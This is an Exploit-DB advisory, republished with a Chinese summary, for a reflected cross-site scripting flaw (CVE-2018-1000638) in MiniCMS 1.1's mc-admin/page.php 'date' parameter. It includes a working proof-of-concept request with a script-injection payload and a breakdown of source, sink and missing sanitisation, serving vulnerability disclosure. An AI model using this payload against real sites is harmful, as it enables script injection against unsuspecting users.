[webapps] MiniCMS 1.1 - Cross Site Scripting (XSS)
MiniCMS 1.1版本中存在跨站脚本(XSS)漏洞,攻击者可通过`date`参数注入恶意脚本。该漏洞未对输入进行过滤或编码处理,导致攻击者能够通过构造特定URL触发XSS攻击。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:8 收藏

# Exploit Title: [MiniCMS 1.1 Cross-Site Scripting (XSS) in date Parameter of mc-admin/page.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/bg5sbk/MiniCMS]
# Software Link: [https://github.com/bg5sbk/MiniCMS]
# Version: [1.10] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2018-1000638]

PoC: 
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>

Details:
{ "Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" }

[Replace Your Domain Name]
            

文章来源: https://www.exploit-db.com/exploits/52175
如有侵权请联系:admin#unsafe.sh